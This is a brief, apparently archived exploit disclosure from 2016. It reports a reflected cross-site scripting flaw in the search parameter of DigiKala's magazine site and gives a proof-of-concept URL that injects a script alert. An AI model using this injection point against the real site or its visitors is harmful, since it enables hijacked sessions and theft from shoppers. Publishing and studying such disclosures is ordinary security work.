DigiKala Of Iran Cross Site Scripting
Posted on 26 January 2016
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title : DigiKala Of Iran XSS Vulnerability [+] [+] Exploit Author : 4TT4CK3R [+] [+] Tested on : Firefox , Windows [+] [+] Discovered by : 4TT4CK3R [+] [+] Category : WebApp [+] [+] HomePage : https://digikala.com [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] About DigiKala : [+] DigiKala biggest store of the Iran, now on the eve of the tenth year, [+] with a range of diverse products for all walks of life and all ages !! [+] Now this website have an XSS Vulnerability that patching soon !! [+] [+] [+] Vulnerable address : [+] https://mag.digikala.com/?s= [+] [+] When we search a product that we can use this template .. [+] For example I would like to see 4TT4CK3R search : [+] https://mag.digikala.com/?s=4TT4CK3R [+] [+] Now we cab using pur script for vulnerability testting : [+] http://mag.digikala.com/?s=<script>alert('4TT4CK3R')</script> [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploited by : 4TT4CK3R [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
